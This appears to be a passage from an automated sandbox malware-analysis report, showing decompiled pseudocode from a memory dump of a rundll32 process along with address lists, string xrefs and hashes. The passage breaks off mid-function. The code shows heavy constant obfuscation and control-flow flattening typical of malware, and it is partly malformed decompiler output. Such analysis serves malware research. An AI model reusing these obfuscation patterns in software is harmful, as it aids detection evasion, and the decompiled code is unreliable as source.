				 *(_t382 + 0x6c) = 0xb89b;
				 *(_t382 + 0x6c) =  *(_t382 + 0x6c) + 0xffffd32a;
				 *(_t382 + 0x6c) =  *(_t382 + 0x6c) ^ 0x0000fcd5;
				 *(_t382 + 0x14) = 0x3892;
				 *(_t382 + 0x14) =  *(_t382 + 0x14) >> 0xa;
				 *(_t382 + 0x14) =  *(_t382 + 0x14) ^ 0x2d57d543;
				 *(_t382 + 0x14) =  *(_t382 + 0x14) + 0x6cb7;
				 *(_t382 + 0x14) =  *(_t382 + 0x14) ^ 0x2d585a45;
				 *(_t382 + 0x28) = 0xad3d;
				 *(_t382 + 0x28) =  *(_t382 + 0x28) + 0xffffae8b;
				 *(_t382 + 0x28) =  *(_t382 + 0x28) >> 2;
				 *(_t382 + 0x28) =  *(_t382 + 0x28) << 7;
				 *(_t382 + 0x28) =  *(_t382 + 0x28) ^ 0x000b51d9;
				 *(_t382 + 0x58) = 0xde2;
				_t342 = 0x39;
				 *(_t382 + 0x54) =  *(_t382 + 0x58) * 0x34;
				 *(_t382 + 0x54) =  *(_t382 + 0x54) / _t342;
				 *(_t382 + 0x54) =  *(_t382 + 0x54) ^ 0x00000d30;
				 *(_t382 + 0x1c) = 0xba82;
				 *(_t382 + 0x1c) =  *(_t382 + 0x1c) << 4;
				 *(_t382 + 0x1c) =  *(_t382 + 0x1c) >> 0xc;
				 *(_t382 + 0x1c) =  *(_t382 + 0x1c) ^ 0xd59b4b7c;
				 *(_t382 + 0x1c) =  *(_t382 + 0x1c) ^ 0xd59b12fd;
				 *(_t382 + 0x40) = 0xa3d9;
				 *(_t382 + 0x40) =  *(_t382 + 0x40) ^ 0xd82378ca;
				 *(_t382 + 0x40) =  *(_t382 + 0x40) + 0xffff3c17;
				 *(_t382 + 0x40) =  *(_t382 + 0x40) ^ 0xd8236a86;
				 *(_t382 + 0x5c) = 0xecab;
				 *(_t382 + 0x5c) =  *(_t382 + 0x5c) >> 0x10;
				 *(_t382 + 0x5c) =  *(_t382 + 0x5c) ^ 0x7d98124e;
				 *(_t382 + 0x5c) =  *(_t382 + 0x5c) ^ 0x7d9832d2;
				 *(_t382 + 0x80) = 0x1387;
				_t343 = 0x2a;
				 *(_t382 + 0x80) =  *(_t382 + 0x80) * 0x63;
				 *(_t382 + 0x80) =  *(_t382 + 0x80) ^ 0x0007c428;
				 *(_t382 + 0x4c) = 0x7ada;
				 *(_t382 + 0x4c) =  *(_t382 + 0x4c) * 0x39;
				 *(_t382 + 0x4c) =  *(_t382 + 0x4c) + 0xffffefa5;
				 *(_t382 + 0x4c) =  *(_t382 + 0x4c) ^ 0x001b3452;
				 *(_t382 + 0x90) = 0x1591;
				 *(_t382 + 0x90) =  *(_t382 + 0x90) >> 8;
				 *(_t382 + 0x90) =  *(_t382 + 0x90) ^ 0x0000431e;
				 *(_t382 + 0x2c) = 0x3f89;
				 *(_t382 + 0x2c) =  *(_t382 + 0x2c) << 5;
				 *(_t382 + 0x2c) =  *(_t382 + 0x2c) | 0xff33b819;
				 *(_t382 + 0x2c) =  *(_t382 + 0x2c) << 7;
				 *(_t382 + 0x2c) =  *(_t382 + 0x2c) ^ 0x9bfcb078;
				 *(_t382 + 0x98) = 0x7441;
				 *(_t382 + 0x98) =  *(_t382 + 0x98) / _t343;
				 *(_t382 + 0x98) =  *(_t382 + 0x98) ^ 0x000035d7;
				 *(_t382 + 0x48) = 0x7f1e;
				 *(_t382 + 0x48) =  *(_t382 + 0x48) + 0x7f31;
				 *(_t382 + 0x48) =  *(_t382 + 0x48) << 0xe;
				 *(_t382 + 0x48) =  *(_t382 + 0x48) ^ 0x3f939bef;
				 *(_t382 + 0x8c) = 0x831c;
				 *(_t382 + 0x8c) =  *(_t382 + 0x8c) << 8;
				 *(_t382 + 0x8c) =  *(_t382 + 0x8c) ^ 0x008363dd;
				 *(_t382 + 0x30) = 0x92b6;
				 *(_t382 + 0x30) =  *(_t382 + 0x30) + 0xa4c2;
				 *(_t382 + 0x30) =  *(_t382 + 0x30) << 0xc;
				 *(_t382 + 0x30) =  *(_t382 + 0x30) << 8;
				 *(_t382 + 0x30) =  *(_t382 + 0x30) ^ 0x77802bdf;
				 *(_t382 + 0x28) = 0x1d89;
				 *(_t382 + 0x28) =  *(_t382 + 0x28) | 0xf9709c7c;
				 *(_t382 + 0x28) =  *(_t382 + 0x28) * 0x25;
				 *(_t382 + 0x28) =  *(_t382 + 0x28) | 0x703957df;
				 *(_t382 + 0x28) =  *(_t382 + 0x28) ^ 0x7d7fbb45;
				 *(_t382 + 0x58) = 0x126d;
				 *(_t382 + 0x58) =  *(_t382 + 0x58) >> 3;
				 *(_t382 + 0x58) =  *(_t382 + 0x58) >> 9;
				 *(_t382 + 0x58) =  *(_t382 + 0x58) ^ 0x000002d5;
				 *(_t382 + 0x7c) = 0x1a69;
				 *(_t382 + 0x7c) =  *(_t382 + 0x7c) | 0x10216cf6;
				 *(_t382 + 0x7c) =  *(_t382 + 0x7c) ^ 0x102141be;
				 *(_t382 + 0x20) = 0xff0b;
				 *(_t382 + 0x20) =  *(_t382 + 0x20) >> 0x10;
				 *(_t382 + 0x20) =  *(_t382 + 0x20) << 7;
				 *(_t382 + 0x20) =  *(_t382 + 0x20) * 0x21;
				 *(_t382 + 0x20) =  *(_t382 + 0x20) ^ 0x000040df;
				 *(_t382 + 0x6c) = 0xe12c;
				 *(_t382 + 0x6c) =  *(_t382 + 0x6c) + 0x79cf;
				 *(_t382 + 0x6c) =  *(_t382 + 0x6c) ^ 0x000152eb;
				 *(_t382 + 0x34) = 0xd574;
				 *(_t382 + 0x34) =  *(_t382 + 0x34) | 0x9559dde1;
				 *(_t382 + 0x34) =  *(_t382 + 0x34) ^ 0x4f646285;
				 *(_t382 + 0x34) =  *(_t382 + 0x34) + 0xffff68ed;
				 *(_t382 + 0x34) =  *(_t382 + 0x34) ^ 0xda3d1e7a;
				 *(_t382 + 0x88) = 0x5832;
				 *(_t382 + 0x88) =  *(_t382 + 0x88) * 0x27;
				 *(_t382 + 0x88) =  *(_t382 + 0x88) ^ 0x000d0611;
				 *(_t382 + 0x50) = 0x55a1;
				 *(_t382 + 0x50) =  *(_t382 + 0x50) << 0xf;
				 *(_t382 + 0x50) =  *(_t382 + 0x50) ^ 0x45d5d069;
				 *(_t382 + 0x50) =  *(_t382 + 0x50) ^ 0x6f0533ce;
				 *(_t382 + 0x14) = 0xc073;
				 *(_t382 + 0x14) =  *(_t382 + 0x14) + 0xffffd37e;
				 *(_t382 + 0x14) =  *(_t382 + 0x14) << 3;
				 *(_t382 + 0x14) =  *(_t382 + 0x14) << 4;
				 *(_t382 + 0x14) =  *(_t382 + 0x14) ^ 0x0049a7c7;
				 *(_t382 + 0x94) = 0xf1be;
				_t337 =  *((intOrPtr*)(_t382 + 0xa0));
				_t344 = 0xa;
				 *(_t382 + 0x94) =  *(_t382 + 0x94) / _t344;
				 *(_t382 + 0x94) =  *(_t382 + 0x94) ^ 0x00002403;
				 *(_t382 + 0x60) = 0x96ef;
				 *(_t382 + 0x60) =  *(_t382 + 0x60) + 0xfa48;
				 *(_t382 + 0x60) =  *(_t382 + 0x60) | 0xbd3809b4;
				 *(_t382 + 0x60) =  *(_t382 + 0x60) ^ 0xbd39967f;
				 *(_t382 + 0x38) = 0xec0c;
				 *(_t382 + 0x38) =  *(_t382 + 0x38) + 0x6908;
				 *(_t382 + 0x38) =  *(_t382 + 0x38) * 0x26;
				 *(_t382 + 0x38) =  *(_t382 + 0x38) >> 9;
				 *(_t382 + 0x38) =  *(_t382 + 0x38) ^ 0x00001f14;
				do {
					while(_t376 != 0x3ac0a14) {
						if(_t376 == 0x7fec1df) {
							_t344 = _t382 + 0x2ac;
							E00250D33(_t382 + 0x2ac,  *(_t382 + 0x48), __eflags,  *((intOrPtr*)(_t382 + 0x70)),  *(_t382 + 0x14),  *((intOrPtr*)(_t382 + 0x24)));
							_t382 = _t382 + 0xc;
							_t376 = 0x12c07630;
							continue;
						} else {
							if(_t376 == 0x12c07630) {
								_push( *(_t382 + 0x1c));
								E002429E3(_t382 + 0x2b0, 0x104, E0025889D( *((intOrPtr*)(_t382 + 0x4b8)),  *(_t382 + 0x58), __eflags),  *(_t382 + 0x5c),  *(_t382 + 0x74),  *(_t382 + 0x94),  *((intOrPtr*)(_t382 + 0xac)),  *((intOrPtr*)(_t382 + 0x4c4)),  *(_t382 + 0x54),  *(_t382 + 0x94));
								_t344 =  *(_t382 + 0x5c);
								E00252025( *(_t382 + 0x5c), _t327,  *((intOrPtr*)(_t382 + 0xc4)),  *((intOrPtr*)(_t382 + 0x70)));
								_t382 = _t382 + 0x30;
								_t376 = 0x3ac0a14;
								continue;
							} else {
								if(_t376 == 0x1f5a6ea2) {
									_t376 = 0x2b635c32;
									continue;
								} else {
									if(_t376 == 0x2b635c32) {
										E00253E3F(_t344, _t382 + 0xa4, __eflags,  *(_t382 + 0x68),  *((intOrPtr*)(_t382 + 0x70)));
										_t331 = E002428CE(_t382 + 0xac,  *(_t382 + 0x50),  *(_t382 + 0x80));
										_t382 = _t382 + 0xc;
										_t376 = 0x7fec1df;
										_t344 = 0;
										 *_t331 = 0;
										continue;
									} else {
										if(_t376 == 0x2c9ad714) {
											E00254F7D( *(_t382 + 0x60),  *(_t382 + 0x38), _t337);
										} else {
											if(_t376 != 0x33ecfade) {
												goto L16;
											} else {
												_t263 = _t380 + 4; // 0xedb0bf04
												E00256CAA( *(_t382 + 0x4c),  *((intOrPtr*)(_t382 + 0xa0)), _t337, _t263,  *(_t382 + 0x64),  *_t380,  *(_t382 + 0x20), _t344,  *_t263,  *(_t382 + 0x94));
												_t382 = _t382 + 0x20;
												_t344 = 1;
												_t376 = 0x2c9ad714;
												_t373 =  !=  ? 1 : _t373;
												continue;
											}
										}
									}
								}
							}
						}
						L19:
						return _t373;
					}
					_t325 = E0024B566(_t344, 0,  *((intOrPtr*)(_t382 + 0xb8)),  *(_t382 + 0x58),  *((intOrPtr*)(_t382 + 0xa8)),  *(_t382 + 0x48), _t344,  *((intOrPtr*)(_t382 + 0x70)),  *(_t382 + 0x90),  *((intOrPtr*)(_t382 + 0x84)),  *(_t382 + 0x2c),  *(_t382 + 0x74),  *(_t382 + 0x1c),  *((intOrPtr*)(_t382 + 0x4b8)));
					_t337 = _t325;
					_t382 = _t382 + 0x30;
					__eflags = _t325 - 0xffffffff;
					if(__eflags == 0) {
						_t376 = 0x18af80d5;
						goto L16;
					} else {
						_t376 = 0x33ecfade;
						continue;
					}
					goto L19;
					L16:
					__eflags = _t376 - 0x18af80d5;
				} while (__eflags != 0);
				goto L19;
			}

0x002488eb
0x002488f3
0x002488fb
0x00248900
0x00248905
0x0024890d
0x00248915
0x0024891d
0x00248925
0x00248935
0x00248937
0x00248942
0x00248944
0x00248949
0x00248952
0x0024895d
0x00248962
0x0024896a
0x00248972
0x0024897a
0x00248982
0x00248987
0x0024898f
0x0024899c
0x0024899f
0x002489a3
0x002489ab
0x002489b3
0x002489bb
0x002489c3
0x002489cb
0x002489d3
0x002489e3
0x002489e7
0x002489ef
0x002489f7
0x002489ff
0x00248a07
0x00248a0f
0x00248a14
0x00248a1c
0x00248a24
0x00248a2c
0x00248a34
0x00248a3c
0x00248a41
0x00248a46
0x00248a4e
0x00248a5b
0x00248a5c
0x00248a66
0x00248a6a
0x00248a72
0x00248a7a
0x00248a7f
0x00248a84
0x00248a8c
0x00248a94
0x00248a9c
0x00248aa4
0x00248aac
0x00248ab4
0x00248abc
0x00248ac1
0x00248acb
0x00248ad3
0x00248ae8
0x00248ae9
0x00248af0
0x00248afb
0x00248b08
0x00248b0c
0x00248b14
0x00248b1c
0x00248b27
0x00248b2f
0x00248b3a
0x00248b42
0x00248b47
0x00248b4f
0x00248b54
0x00248b5c
0x00248b70
0x00248b77
0x00248b82
0x00248b8a
0x00248b92
0x00248b97
0x00248b9f
0x00248baa
0x00248bb2
0x00248bbd
0x00248bc5
0x00248bcd
0x00248bd2
0x00248bd7
0x00248bdf
0x00248be7
0x00248bf4
0x00248bf8
0x00248c00
0x00248c08
0x00248c10
0x00248c15
0x00248c1a
0x00248c22
0x00248c2a
0x00248c32
0x00248c3a
0x00248c42
0x00248c47
0x00248c51
0x00248c55
0x00248c5d
0x00248c65
0x00248c6d
0x00248c75
0x00248c7d
0x00248c85
0x00248c8d
0x00248c95
0x00248c9d
0x00248cb0
0x00248cb7
0x00248cc2
0x00248cca
0x00248ccf
0x00248cd7
0x00248cdf
0x00248ce7
0x00248cef
0x00248cf4
0x00248cf9
0x00248d01
0x00248d17
0x00248d1e
0x00248d21
0x00248d28
0x00248d33
0x00248d3b
0x00248d43
0x00248d4b
0x00248d53
0x00248d5b
0x00248d68
0x00248d6c
0x00248d71
0x00248d79
0x00248d79
0x00248d8b
0x00248ecd
0x00248ee0
0x00248ee5
0x00248ee8
0x00000000
0x00248d91
0x00248d97
0x00248e4f
0x00248ea1
0x00248eb3
0x00248eb7
0x00248ebc
0x00248ebf
0x00000000
0x00248d9d
0x00248da3
0x00248e45
0x00000000
0x00248da9
0x00248daf
0x00248e17
0x00248e2e
0x00248e33
0x00248e36
0x00248e3b
0x00248e3d
0x00000000
0x00248db1
0x00248db7
0x00248f65
0x00248dbd
0x00248dc3
0x00000000
0x00248dc9
0x00248dd0
0x00248dee
0x00248df5
0x00248df8
0x00248df9
0x00248e00
0x00000000
0x00248e00
0x00248dc3
0x00248db7
0x00248daf
0x00248da3
0x00248d97
0x00248f6b
0x00248f77
0x00248f77
0x00248f30
0x00248f35
0x00248f37
0x00248f3a
0x00248f3d
0x00248f49
0x00000000
0x00248f3f
0x00248f3f
0x00000000
0x00248f3f
0x00000000
0x00248f4e
0x00248f4e
0x00248f4e
0x00000000

Strings

EZX-, xrefs: 00248A24
Ui=, xrefs: 00248915
At, xrefs: 00248B5C
2\c+, xrefs: 00248DA9
2\c+, xrefs: 00248E45
,, xrefs: 00248C5D
0, xrefs: 00248A6A
2X, xrefs: 00248C9D
Q#JK, xrefs: 002489AB

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: ,$0$2X$2\c+$2\c+$At$EZX-$Q#JK$Ui=
API String ID: 2962429428-1096774584
Opcode ID: c6f97d9852e594908297d7dc3ae08885571f18f7e498a7c9f787d4f134a9b738
Instruction ID: fcfa2288fff0d4286f203c5a55927e0feedd74f84ff3eabd98d228dc4f3c4ebe
Opcode Fuzzy Hash: c6f97d9852e594908297d7dc3ae08885571f18f7e498a7c9f787d4f134a9b738
Instruction Fuzzy Hash: F3F11F725183809FD368CF65C48A65FBBE1BBC4708F10891DF59A962A0C7B98959CF43

Uniqueness

Uniqueness Score: -1.00%

Function 002526F5, Relevance: 11.5, Strings: 9, Instructions: 225
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E002526F5(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				void* __edi;
				void* __ebp;
				intOrPtr _t199;
				intOrPtr _t201;
				void* _t202;
				intOrPtr _t204;
				intOrPtr _t208;
				intOrPtr _t209;
				intOrPtr* _t210;
				signed int _t212;
				signed int _t213;
				signed int _t214;
				signed int _t215;
				void* _t216;
				void* _t224;
				void* _t237;
				intOrPtr _t241;
				void* _t242;
				intOrPtr _t246;
				signed int* _t247;

				_t247 =  &_v88;
				_v12 = 0x29be25;
				_v8 = 0x714c58;
				_t241 = 0;
				_t210 = __edx;
				_v4 = 0;
				_v28 = 0x1199;
				_t246 = __ecx;
				_v28 = _v28 + 0xffffe920;
				_t242 = 0x2efb68f6;
				_v28 = _v28 ^ 0xffffad72;
				_v32 = 0x5bb2;
				_t212 = 0x22;
				_v32 = _v32 / _t212;
				_v32 = _v32 ^ 0x00002aec;
				_v56 = 0xeb34;
				_t213 = 0x1b;
				_v56 = _v56 * 0x6a;
				_v56 = _v56 + 0x2965;
				_v56 = _v56 ^ 0x0061feda;
				_v84 = 0xfe4e;
				_v84 = _v84 + 0xd2a6;
				_v84 = _v84 >> 3;
				_v84 = _v84 | 0x3d0bc2c6;
				_v84 = _v84 ^ 0x3d0bc81e;
				_v20 = 0x5db0;
				_v20 = _v20 + 0xffffd438;
				_v20 = _v20 ^ 0x00005602;
				_v24 = 0xa932;
				_v24 = _v24 * 0x1f;
				_v24 = _v24 ^ 0x00145068;
				_v88 = 0xc29f;
				_v88 = _v88 * 0x34;
				_v88 = _v88 ^ 0xcbbf1de0;
				_v88 = _v88 + 0x67bb;
				_v88 = _v88 ^ 0xcb98f8b4;
				_v36 = 0x7c84;
				_v36 = _v36 + 0x6da7;
				_v36 = _v36 ^ 0x0000df84;
				_v60 = 0xf0d8;
				_v60 = _v60 + 0xffffcb07;
				_v60 = _v60 * 0x50;
				_v60 = _v60 ^ 0x003a95e0;
				_v44 = 0x6681;
				_v44 = _v44 + 0xffff19d2;
				_v44 = _v44 / _t213;
				_v44 = _v44 ^ 0x097b3a7d;
				_v16 = 0x94d;
				_v16 = _v16 + 0x4187;
				_v16 = _v16 ^ 0x00007836;
				_v48 = 0x21e9;
				_v48 = _v48 ^ 0x3c92a0ae;
				_v48 = _v48 + 0xf596;
				_v48 = _v48 ^ 0x3c9366ad;
				_v52 = 0x4a04;
				_v52 = _v52 * 0x54;
				_v52 = _v52 ^ 0x56a39f58;
				_v52 = _v52 ^ 0x56bbe121;
				_v80 = 0x166f;
				_v80 = _v80 ^ 0x3bc38db2;
				_v80 = _v80 << 0xd;
				_v80 = _v80 | 0x5d8ccce3;
				_v80 = _v80 ^ 0x7fffd756;
				_v76 = 0xd2e;
				_t214 = 6;
				_v76 = _v76 / _t214;
				_t215 = 0x59;
				_t237 = 0xdd7d922;
				_v76 = _v76 / _t215;
				_v76 = _v76 ^ 0xb1a59fe6;
				_v76 = _v76 ^ 0xb1a5c97b;
				_v40 = 0x2ae1;
				_v40 = _v40 >> 6;
				_v40 = _v40 << 2;
				_v40 = _v40 ^ 0x0000341b;
				_v64 = 0x37cd;
				_v64 = _v64 + 0xffff3540;
				_v64 = _v64 << 1;
				_v64 = _v64 | 0x66261fef;
				_v64 = _v64 ^ 0xfffeb931;
				_v68 = 0x9ed9;
				_v68 = _v68 + 0xad09;
				_v68 = _v68 ^ 0xfd9e5c2b;
				_v68 = _v68 >> 4;
				_v68 = _v68 ^ 0x0fd99075;
				_v72 = 0x1a2d;
				_v72 = _v72 + 0xc4a4;
				_v72 = _v72 << 6;
				_v72 = _v72 * 0x59;
				_v72 = _v72 ^ 0x135ddffd;
				while(1) {
					L1:
					_t216 = 0x2c1c6573;
					while(_t242 != 0x6072d1c) {
						if(_t242 == _t237) {
							_push(_t216);
							_t199 = E00241132(_v44, _t216, _v16, _t216, _t241, _v48, _v52, _v80, E00242A30);
							_t247 =  &(_t247[9]);
							 *((intOrPtr*)(_t241 + 0x1c)) = _t199;
							__eflags = _t199;
							_t216 = 0x2c1c6573;
							_t242 =  !=  ? 0x2c1c6573 : 0x6072d1c;
							L13:
							_t237 = 0xdd7d922;
							continue;
						}
						if(_t242 == 0xe9e2879) {
							_push(_v24);
							_t201 = E00256DB9( *((intOrPtr*)(_t210 + 4)), _t241, _t246, __eflags, _t216,  *_t210, _v84, _v20);
							_t247 =  &(_t247[5]);
							 *((intOrPtr*)(_t241 + 0x28)) = _t201;
							__eflags = _t201;
							_t202 = 0x303a6ade;
							_t242 =  !=  ? 0x303a6ade : 0x28cfd81a;
							L12:
							_t216 = 0x2c1c6573;
							goto L13;
						}
						if(_t242 == 0x28cfd81a) {
							return E0024F536(_v64, _v68, _v72, _t241);
						}
						if(_t242 == _t216) {
							 *((intOrPtr*)(_t241 + 0x24)) = _t246;
							_t204 =  *0x25ca24; // 0x0
							 *((intOrPtr*)(_t241 + 0x2c)) = _t204;
							 *0x25ca24 = _t241;
							return _t204;
						}
						if(_t242 != 0x2efb68f6) {
							if(_t242 != _t202) {
								L17:
								__eflags = _t242 - 0x35b12720;
								if(__eflags != 0) {
									continue;
								} else {
									return _t202;
								}
								L22:
							} else {
								_t209 = E002476DB( *((intOrPtr*)(_t241 + 0x28)), _v88, _v36, _v60);
								_t247 =  &(_t247[2]);
								 *((intOrPtr*)(_t241 + 4)) = _t209;
								_t237 = 0xdd7d922;
								_t242 =  !=  ? 0xdd7d922 : 0x6072d1c;
								goto L1;
							}
						}
						_push(_t216);
						_push(_t216);
						_t224 = 0x38;
						_t208 = E00248736(_t224);
						_t241 = _t208;
						__eflags = _t241;
						if(__eflags != 0) {
							_t242 = 0xe9e2879;
							_t202 = 0x303a6ade;
							goto L12;
						}
						return _t208;
						goto L22;
					}
					E0025422C(_v76,  *((intOrPtr*)(_t241 + 0x28)), _v40);
					_t242 = 0x28cfd81a;
					_t216 = 0x2c1c6573;
					_t237 = 0xdd7d922;
					goto L17;
				}
			}

0x002526f5
0x002526f8
0x00252700
0x0025270c
0x0025270e
0x00252710
0x00252716
0x0025271e
0x00252720
0x00252728
0x0025272d
0x00252735
0x00252743
0x00252748
0x0025274e
0x00252756
0x00252763
0x00252764
0x00252768
0x00252770
0x00252778
0x00252780
0x00252788
0x0025278d
0x00252795
0x0025279d
0x002527a5
0x002527ad
0x002527b5
0x002527c2
0x002527c6
0x002527ce
0x002527db
0x002527df
0x002527e7
0x002527ef
0x002527f7
0x002527ff
0x00252807
0x0025280f
0x00252817
0x00252824
0x00252828
0x00252830
0x00252838
0x00252846
0x0025284a
0x00252852
0x0025285a
0x00252862
0x0025286a
0x00252872
0x0025287a
0x00252882
0x0025288a
0x00252897
0x0025289b
0x002528a3
0x002528ab
0x002528b3
0x002528bb
0x002528c0
0x002528c8
0x002528d0
0x002528e0
0x002528e5
0x002528ef
0x002528f2
0x002528f7
0x002528fb
0x00252903
0x0025290b
0x00252913
0x00252918
0x0025291d
0x00252925
0x0025292d
0x00252935
0x00252939
0x00252941
0x00252949
0x00252951
0x00252959
0x00252961
0x00252966
0x0025296e
0x00252976
0x0025297e
0x00252988
0x0025298c
0x00252994
0x00252994
0x00252999
0x0025299e
0x002529ac
0x00252a76
0x00252a93
0x00252a98
0x00252a9b
0x00252a9e
0x00252aa5
0x00252aaf
0x00252a3e
0x00252a3e
0x00000000
0x00252a3e
0x002529b8
0x00252a48
0x00252a5a
0x00252a5f
0x00252a62
0x00252a65
0x00252a6c
0x00252a71
0x00252a39
0x00252a39
0x00000000
0x00252a39
0x002529c4
0x00000000
0x00252b0d
0x002529cc
0x00252ae7
0x00252aea
0x00252aef
0x00252af2
0x00000000
0x00252af2
0x002529d8
0x002529dc
0x00252ad9
0x00252ad9
0x00252adf
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x002529e2
0x002529f1
0x002529f6
0x002529f9
0x00252a03
0x00252a08
0x00000000
0x00252a08
0x002529dc
0x00252a19
0x00252a1a
0x00252a1d
0x00252a1e
0x00252a23
0x00252a27
0x00252a29
0x00252a2f
0x00252a34
0x00000000
0x00252a34
0x00252b15
0x00000000
0x00252b15
0x00252abf
0x00252ac5
0x00252acf
0x00252ad4
0x00000000
0x00252ad4

Strings

}:{, xrefs: 0025284A
XLq, xrefs: 00252700
*, xrefs: 0025290B
., xrefs: 002528D0
e), xrefs: 00252768
6x, xrefs: 00252862
*, xrefs: 0025274E
4, xrefs: 00252756
!, xrefs: 0025286A

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: .$4$6x$XLq$e)$}:{$!$*$*
API String ID: 0-323616845
Opcode ID: 7c0505cd4213b6a867f5c1983555ed2db1179862d2d4cd4fb58735f60bc364c7
Instruction ID: d07458f051f9e626a1b907a20533adb9289794429206eb5a68594cbc855d0314
Opcode Fuzzy Hash: 7c0505cd4213b6a867f5c1983555ed2db1179862d2d4cd4fb58735f60bc364c7
Instruction Fuzzy Hash: AAA161729183418FD368CF25C88940BFBE1FB85718F108A1DF4999A2A0D3B5CA59CF86

Uniqueness

Uniqueness Score: -1.00%

Function 002563C1, Relevance: 11.4, Strings: 9, Instructions: 194
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E002563C1() {
				intOrPtr _v4;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				void* _t166;
				signed int _t167;
				signed int _t168;
				void* _t173;
				void* _t191;
				intOrPtr _t196;
				signed int _t197;
				signed int _t198;
				signed int _t199;
				signed int _t200;
				signed int _t201;
				intOrPtr _t202;
				intOrPtr* _t203;
				signed int _t204;
				signed int* _t205;

				_t205 =  &_v76;
				_v8 = 0x6b5f41;
				_t196 = 0;
				_t173 = 0x1e312b00;
				_v4 = 0;
				_v40 = 0xbf50;
				_v40 = _v40 + 0xffff4d7d;
				_v40 = _v40 ^ 0x1ff0eb0a;
				_v40 = _v40 ^ 0x1ff1e7c7;
				_v68 = 0xcba5;
				_v68 = _v68 + 0xffffed4d;
				_v68 = _v68 >> 9;
				_v68 = _v68 | 0x05a9bf19;
				_v68 = _v68 ^ 0x05a9faf6;
				_v52 = 0xab70;
				_v52 = _v52 + 0xffff3c3f;
				_v52 = _v52 ^ 0x3be47de3;
				_v52 = _v52 ^ 0xc41b8c81;
				_v20 = 0x4c56;
				_t27 =  &_v20; // 0x4c56
				_t197 = 0x53;
				_v20 =  *_t27 / _t197;
				_v20 = _v20 ^ 0x00006ba4;
				_v44 = 0x4e4f;
				_v44 = _v44 + 0xffff1389;
				_v44 = _v44 ^ 0x6e1bb2f9;
				_v44 = _v44 ^ 0x91e4a702;
				_v48 = 0x9b6d;
				_t198 = 0x15;
				_v48 = _v48 / _t198;
				_v48 = _v48 << 0xe;
				_v48 = _v48 ^ 0x01d9d03e;
				_v16 = 0x7c52;
				_t199 = 0x3a;
				_v16 = _v16 * 0x14;
				_v16 = _v16 ^ 0x0009e5e2;
				_v64 = 0x462a;
				_v64 = _v64 ^ 0x0e1a4a8f;
				_v64 = _v64 >> 3;
				_v64 = _v64 >> 0xc;
				_v64 = _v64 ^ 0x000014fb;
				_v72 = 0x5cc4;
				_v72 = _v72 / _t199;
				_v72 = _v72 + 0x2f24;
				_v72 = _v72 + 0xd2bc;
				_v72 = _v72 ^ 0x000179b4;
				_v24 = 0x30ff;
				_t200 = 0x2a;
				_v24 = _v24 / _t200;
				_v24 = _v24 ^ 0x00007cf0;
				_v28 = 0x85cd;
				_v28 = _v28 ^ 0xf8a4d4b8;
				_v28 = _v28 ^ 0xf8a43927;
				_v76 = 0x1878;
				_v76 = _v76 ^ 0x7099aca3;
				_v76 = _v76 ^ 0x4acb853d;
				_v76 = _v76 + 0xffff4ab7;
				_v76 = _v76 ^ 0x3a511503;
				_v32 = 0x1800;
				_v32 = _v32 << 1;
				_v32 = _v32 ^ 0x00002132;
				_v60 = 0xa25b;
				_v60 = _v60 * 0x67;
				_v60 = _v60 + 0x9ac4;
				_v60 = _v60 ^ 0x004180d5;
				_v36 = 0x47a4;
				_v36 = _v36 << 9;
				_v36 = _v36 ^ 0xcd228633;
				_v36 = _v36 ^ 0xcdadbf4b;
				_v12 = 0xe30d;
				_v12 = _v12 << 8;
				_v12 = _v12 ^ 0x00e3661f;
				_t172 = _v12;
				_t204 = _v12;
				_t201 = _v12;
				_v56 = 0x2740;
				_v56 = _v56 ^ 0x239771de;
				_v56 = _v56 + 0xfffffe7e;
				_v56 = _v56 ^ 0x23985523;
				while(1) {
					L1:
					_t191 = 0x5c;
					while(1) {
						L2:
						do {
							L3:
							while(_t173 != 0x3fc1d7) {
								if(_t173 == 0x353ab5a) {
									_t202 =  *0x25ca2c; // 0x2c8300
									_t203 = _t202 + 0x230;
									while( *_t203 != _t191) {
										_t203 = _t203 + 2;
									}
									_t201 = _t203 + 2;
									_t173 = 0x6fcf9e2;
									goto L2;
								} else {
									if(_t173 == 0x6adc8a5) {
										_t167 = E0024F65F(_v40, _v44, _v48, _v16, _t201, _t172, _v64);
										_t205 =  &(_t205[5]);
										_t204 = _t167;
										_t166 = 0xd265085;
										_t173 =  !=  ? 0xd265085 : 0x3fc1d7;
										_t191 = 0x5c;
										continue;
									} else {
										if(_t173 == 0x6fcf9e2) {
											_t168 = E00242959(_t173, _v68, _v52, _v20, _v56);
											_t172 = _t168;
											_t205 =  &(_t205[4]);
											if(_t168 != 0) {
												_t173 = 0x6adc8a5;
												goto L1;
											}
										} else {
											if(_t173 == _t166) {
												E0025507B(_v72, _v24, _v28, _v76, _t204);
												_t205 =  &(_t205[3]);
												_t196 =  !=  ? 1 : _t196;
